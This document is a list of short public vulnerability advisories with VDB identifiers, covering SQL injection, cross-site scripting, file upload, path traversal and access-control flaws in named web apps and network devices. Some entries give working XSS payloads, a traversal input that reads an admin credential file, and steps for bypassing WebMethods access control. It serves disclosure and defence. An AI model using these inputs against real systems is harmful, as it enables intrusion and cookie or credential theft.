A vulnerability was found in SourceCodester Simple Student Attendance System 1.0. It has been classified as critical. Affected is an unknown function of the file attendance.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247254 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Student Attendance System 1.0 and classified as problematic. This issue affects some unknown processing of the file index.php. The manipulation of the argument page leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247253 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Typecho 1.2.1. Affected by this issue is some unknown functionality of the file /admin/manage-users.php. The manipulation of the argument page leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-247250 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Typecho 1.2.1. Affected by this vulnerability is an unknown functionality of the file /admin/manage-pages.php of the component Page Handler. The manipulation leads to backdoor. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247249 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic has been found in Typecho 1.2.1. Affected is an unknown function of the file /admin/options-theme.php of the component Logo Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tongda OA 2017 up to 11.9. It has been declared as critical. This vulnerability affects unknown code of the file pda/pad/email/delete.php. The manipulation of the argument EMAIL_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-247246 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in osCommerce 4. It has been classified as problematic. This affects an unknown part of the file /b2b-supermarket/catalog/all-products. The manipulation of the argument keywords with the input %27%22%3E%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this issue is some unknown functionality of the file general/notify/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-247244. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Tongda OA 2017 up to 11.10 and classified as critical. Affected by this vulnerability is an unknown functionality of the file general/wiki/cp/manage/delete.php. The manipulation of the argument TERM_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247243. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in D-Link DAR-7000 up to 20231126 and classified as critical. This vulnerability affects unknown code of the file /user/inc/workidajax.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247162 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in D-Link DIR-846 FW100A53DBR. This affects an unknown part of the file /HNAP1/ of the component QoS POST Handler. The manipulation of the argument smartqos_express_devices/smartqos_normal_devices leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247161 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in osCommerce 4. Affected by this issue is some unknown functionality of the file /b2b-supermarket/shopping-cart of the component POST Parameter Handler. The manipulation of the argument estimate[country_id] leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-247160. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Software AG WebMethods 10.11.x/10.15.x. Affected is an unknown function of the file wm.server/connect/. The manipulation leads to improper access controls. It is possible to launch the attack remotely. To access a file like /assets/ a popup may request username and password. By just clicking CANCEL you will be redirected to the directory. If you visited /invoke/wm.server/connect, you'll be able to see details like internal IPs, ports, and versions. In some cases if access to /assets/ is refused, you may enter /assets/x as a wrong value, then come back to /assets/ which we will show the requested data. It appears that insufficient access control is depending on referrer header data. VDB-247158 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro PatrolFlow 2530Pro up to 20231126. It has been rated as problematic. This issue affects some unknown processing of the file /log/mailsendview.php. The manipulation of the argument file with the input /boot/phpConfig/tb_admin.txt leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247157 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro S210 up to 20231123. It has been declared as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php of the component HTTP POST Request Handler. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247156. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro S210 up to 20231121. It has been classified as critical. This affects an unknown part of the file /Tool/repair.php of the component HTTP POST Request Handler. The manipulation of the argument txt leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-247155. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro Smart S20 up to 20231120 and classified as critical. Affected by this issue is some unknown functionality of the file /sysmanage/updateos.php of the component HTTP POST Request Handler. The manipulation of the argument 1_file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247154 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in PHPGurukul Nipah Virus Testing Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file manage-phlebotomist.php. The manipulation of the argument pid leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-246640.
A vulnerability, which was classified as problematic, was found in SourceCodester Online Quiz System 1.0. This affects an unknown part of the file take-quiz.php. The manipulation of the argument quiz_taker/year_section leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246639.
A vulnerability, which was classified as problematic, has been found in PHPEMS 7.0. This issue affects some unknown processing of the file app\content\cls\api.cls.php of the component Content Section Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-246629 was assigned to this vulnerability.
A vulnerability was found in Thecosy IceCMS 2.0.1. It has been rated as problematic. This issue affects some unknown processing of the file /Websquare/likeClickComment/ of the component Comment Like Handler. The manipulation leads to improper enforcement of a single, unique action. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-246617 was assigned to this vulnerability.
A vulnerability was found in Thecosy IceCMS 2.0.1. It has been declared as problematic. This vulnerability affects unknown code of the file /planet of the component User Comment Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-246616.
A vulnerability was found in PHPGurukul Nipah Virus Testing Management System 1.0. It has been classified as problematic. This affects an unknown part of the file registered-user-testing.php. The manipulation of the argument regmobilenumber leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246615.
A vulnerability was found in SourceCodester User Registration and Login System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /endpoint/add-user.php. The manipulation of the argument user leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-246614 is the identifier assigned to this vulnerability.
A vulnerability has been found in SourceCodester User Registration and Login System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /endpoint/add-user.php. The manipulation of the argument first_name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-246613 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester User Registration and Login System 1.0. Affected is an unknown function of the file /endpoint/delete-user.php. The manipulation of the argument user leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-246612.
A vulnerability was found in PHPGurukul Nipah Virus Testing Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file add-phlebotomist.php. The manipulation of the argument empid/fullname leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-246445 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Book Borrower System 1.0 and classified as problematic. This issue affects some unknown processing of the file endpoint/add-book.php. The manipulation of the argument Book Title/Book Author leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246443.
A vulnerability classified as problematic was found in ZenTao PMS 18.8. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246439.
A vulnerability classified as problematic has been found in Thecosy IceCMS 2.0.1. Affected is an unknown function of the file /WebArticle/articles/ of the component Like Handler. The manipulation leads to improper enforcement of a single, unique action. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-246438 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in PHPGurukul Nipah Virus Testing Management System 1.0. This affects an unknown part of the file add-phlebotomist.php. The manipulation of the argument empid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246423.
A vulnerability classified as problematic was found in NotePad++ up to 8.1. Affected by this vulnerability is an unknown functionality of the file dbghelp.exe. The manipulation leads to uncontrolled search path. An attack has to be approached locally. The identifier VDB-246421 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester URL Shortener 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Long URL Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246139.
A vulnerability, which was classified as critical, was found in moses-smt mosesdecoder up to 4.0. This affects an unknown part of the file contrib/iSenWeb/trans_result.php. The manipulation of the argument input1 leads to os command injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246135.
A vulnerability, which was classified as critical, has been found in Xiamen Four-Faith Video Surveillance Management System 2016/2017. Affected by this issue is some unknown functionality of the component Apache Struts. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-246134 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in jeecgboot JimuReport up to 1.6.1. Affected by this vulnerability is an unknown functionality of the file /download/image. The manipulation of the argument imageUrl leads to relative path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-246133 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in SourceCodester Free and Open Source Inventory Management System 1.0. Affected is an unknown function of the file /ample/app/ajax/member_data.php. The manipulation of the argument columns leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-246132.
A vulnerability was found in SourceCodester Free and Open Source Inventory Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file ample/app/ajax/suppliar_data.php. The manipulation of the argument columns leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246131.
A vulnerability was found in Tecno 4G Portable WiFi TR118 TR118-M30E-RR-D-EnFrArSwHaPo-OP-V008-20220830. It has been declared as critical. This vulnerability affects unknown code of the file /goform/goform_get_cmd_process of the component Ping Tool. The manipulation of the argument url leads to os command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-246130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in CSZCMS 1.3.0. It has been classified as problematic. This affects an unknown part of the file /admin/settings/ of the component Site Settings Page. The manipulation of the argument Additional Meta Tag with the input &lt;svg&gt;&lt;animate onbegin=alert(1) attributeName=x dur=1s&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-246129 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in CSZCMS 1.3.0 and classified as critical. Affected by this issue is some unknown functionality of the file \views\templates of the component File Manager Page. The manipulation leads to permission issues. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-246128. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in SourceCodester Best Courier Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file parcel_list.php of the component GET Parameter Handler. The manipulation of the argument id with the input &lt;/TiTlE&gt;&lt;ScRiPt&gt;alert(1)&lt;/ScRiPt&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246127.
A vulnerability, which was classified as problematic, was found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function. The manipulation of the argument page with the input &lt;/TiTlE&gt;&lt;ScRiPt&gt;alert(1)&lt;/ScRiPt&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-246126 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Apryse iText 8.0.1. This issue affects some unknown processing of the file PdfDocument.java of the component Reference Table Handler. The manipulation leads to memory leak. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 8.0.2 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-246125 was assigned to this vulnerability. NOTE: The vendor was contacted early about this vulnerability. The fix was introduced in the iText 8.0.2 release on October 25th 2023, prior to the disclosure.
A vulnerability classified as problematic has been found in PHPGurukul Nipah Virus Testing Management System 1.0. This affects an unknown part of the file patient-search-report.php of the component Search Report Page. The manipulation of the argument Search By Patient Name with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246123.
A vulnerability was found in osCommerce 4. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /catalog/compare of the component Instant Message Handler. The manipulation of the argument compare with the input 40dz4iq"&gt;&lt;script&gt;alert(1)&lt;/script&gt;zohkx leads to cross site scripting. The attack may be launched remotely. VDB-246122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file general/wiki/cp/ct/delete.php. The manipulation of the argument PROJ_ID_STR leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-246105 was assigned to this vulnerability.
A vulnerability was found in TOTVS Fluig Platform 1.6.x/1.7.x/1.8.0/1.8.1. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /mobileredir/openApp.jsp of the component mobileredir. The manipulation of the argument redirectUrl/user with the input "&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.7.1-231128, 1.8.0-231127 and 1.8.1-231127 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-246104.
A vulnerability was found in Byzoro Smart S80 up to 20231108. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /sysmanage/updatelib.php of the component PHP File Handler. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-246103. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in GetSimpleCMS 3.3.16/3.4.0a. It has been rated as critical. This issue affects some unknown processing of the file /admin/theme-edit.php. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-245735.
A vulnerability has been found in Intelbras RX 1500 1.1.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /WiFi.html of the component SSID Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-245065 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Maiwei Safety Production Control Platform 4.1. Affected is an unknown function of the file /Content/Plugins/uploader/FileChoose.html?fileUrl=/Upload/File/Pics/&amp;parent. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-245064. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in Maiwei Safety Production Control Platform 4.1. This issue affects some unknown processing of the file /TC/V2.7/ha.html of the component Intelligent Monitoring. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-245063. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in Maiwei Safety Production Control Platform 4.1. This vulnerability affects unknown code of the file /api/DataDictionary/GetItemList. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-245062 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Shenzhen Youkate Industrial Facial Love Cloud Payment System up to 1.0.55.0.0.1. This affects an unknown part of the file /SystemMng.ashx of the component Account Handler. The manipulation of the argument operatorRole with the input 00 leads to improper privilege management. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-245061 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. Affected by this issue is some unknown functionality of the file general/vehicle/checkup/delete.php. The manipulation of the argument VU_ID leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-244994 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in PHPGurukul Restaurant Table Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file booking-details.php of the component Reservation Status Handler. The manipulation of the argument bid leads to information disclosure. The attack can be launched remotely. The identifier VDB-244945 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in PHPGurukul Restaurant Table Booking System 1.0. Affected is an unknown function of the file index.php of the component Reservation Request Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-244944.
A vulnerability was found in PHPGurukul Restaurant Table Booking System 1.0. It has been rated as critical. This issue affects some unknown processing of the file check-status.php of the component Booking Reservation Handler. The manipulation leads to sql injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-244943.
A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file general/wiki/cp/manage/lock.php. The manipulation of the argument TERM_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-244875. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Tongda OA 2017 up to 11.9. Affected by this issue is some unknown functionality of the file general/system/censor_words/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-244874 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in Tongda OA 2017 up to 11.9. Affected is an unknown function of the file general/system/censor_words/module/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-244872. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in Byzoro Smart S85F Management Platform V31R02B10-01. Affected is an unknown function of the file /login.php. The manipulation of the argument txt_newpwd leads to weak password recovery. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-244992. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Campcodes Simple Student Information System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/students/manage_academic.php. The manipulation of the argument student_id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-244330 is the identifier assigned to this vulnerability.
A vulnerability was found in Campcodes Simple Student Information System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/students/manage_academic.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-244329 was assigned to this vulnerability.
A vulnerability was found in Campcodes Simple Student Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/departments/manage_department.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-244328.
A vulnerability has been found in Campcodes Simple Student Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/courses/manage_course.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-244327.
A vulnerability, which was classified as critical, was found in Campcodes Simple Student Information System 1.0. Affected is an unknown function of the file /admin/students/update_status.php. The manipulation of the argument student_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-244326 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in Campcodes Simple Student Information System 1.0. This issue affects some unknown processing of the file /classes/Master.php. The manipulation of the argument f leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-244325 was assigned to this vulnerability.
A vulnerability classified as critical was found in Campcodes Simple Student Information System 1.0. This vulnerability affects unknown code of the file /admin/courses/view_course.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-244324.
A vulnerability classified as critical has been found in Campcodes Simple Student Information System 1.0. This affects an unknown part of the file /admin/index.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-244323.
A vulnerability was found in SourceCodester Company Website CMS 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /dashboard/createblog of the component Create Blog Page. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-244310 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Visitor Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-244308.
A vulnerability classified as critical has been found in Lissy93 Dashy 2.1.1. This affects an unknown part of the file /config-manager/save of the component Configuration Handler. The manipulation of the argument config leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-244305 was assigned to this vulnerability.
A vulnerability was found in PopojiCMS 2.0.1 and classified as problematic. This issue affects some unknown processing of the file install.php of the component Web Config. The manipulation of the argument Site Title with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-244229 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in AlexanderLivanov FotosCMS2 up to 2.4.3. This vulnerability affects unknown code of the file profile.php of the component Cookie Handler. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-243802 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Task Reminder System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file classes/Users.php?f=delete. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-243800.
A vulnerability classified as critical has been found in ColumbiaSoft Document Locator. This affects an unknown part of the file /api/authentication/login of the component WebTools. The manipulation of the argument Server leads to improper authentication. It is possible to initiate the attack remotely. Upgrading to version 7.2 SP4 and 2021.1 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-243729 was assigned to this vulnerability.
A vulnerability was found in code-projects Admission Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file student_avatar.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-243728.
A vulnerability was found in Nanning Ontall Longxing Industrial Development Zone Project Construction and Installation Management System up to 20231026. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file login.aspx. The manipulation of the argument tbxUserName leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243727.
A vulnerability was found in Shanghai CTI Navigation CTI Monitoring and Early Warning System 2.2. It has been classified as critical. This affects an unknown part of the file /Web/SysManage/UserEdit.aspx. The manipulation of the argument ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-243717 was assigned to this vulnerability.
A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/list_onlineuser.php. The manipulation of the argument SessionId leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-243716. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
A vulnerability was found in SourceCodester Task Reminder System 1.0. It has been classified as critical. This affects an unknown part of the file /classes/Master.php?f=save_reminder. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-243645 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Task Reminder System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /classes/Master.php?f=delete_reminder. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-243644.
A vulnerability was found in SourceCodester Simple Real Estate Portal System 1.0. It has been classified as critical. Affected is an unknown function of the file view_estate.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-243618 is the identifier assigned to this vulnerability.
A vulnerability was found in PHPGurukul Nipah Virus Testing Management System 1.0 and classified as critical. This issue affects some unknown processing of the file login.php. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The identifier VDB-243617 was assigned to this vulnerability.
A vulnerability was found in CodeAstro POS System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /setting of the component Logo Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-243602 is the identifier assigned to this vulnerability.
A vulnerability was found in CodeAstro POS System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /profil of the component Profile Picture Handler. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-243601 was assigned to this vulnerability.
A vulnerability was found in PHPGurukul Online Railway Catering System 1.0. It has been classified as critical. Affected is an unknown function of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-243600.
A vulnerability has been found in SourceCodester Sticky Notes App 1.0 and classified as critical. This vulnerability affects unknown code of the file endpoint/delete-note.php. The manipulation of the argument note leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-243598 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Sticky Notes App 1.0. This affects an unknown part of the file endpoint/add-note.php. The manipulation of the argument noteTitle/noteContent leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-243597 was assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester File Manager App 1.0. Affected by this vulnerability is an unknown functionality of the file endpoint/add-file.php. The manipulation of the argument uploadedFileName leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243595.
A vulnerability classified as problematic has been found in Dragon Path 707GR1 up to 20231022. Affected is an unknown function of the component Ping Diagnostics. The manipulation of the argument Host Address with the input &gt;&gt;&lt;img/src/onerror=alert(1)&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-243594 is the identifier assigned to this vulnerability.
A vulnerability was found in Shaanxi Chanming Education Technology Score Query System 5.0. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument stuIdCard leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-243593 was assigned to this vulnerability.
A vulnerability was found in GeoServer GeoWebCache up to 1.15.1. It has been declared as problematic. This vulnerability affects unknown code of the file /geoserver/gwc/rest.html. The manipulation leads to direct request. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-243592.
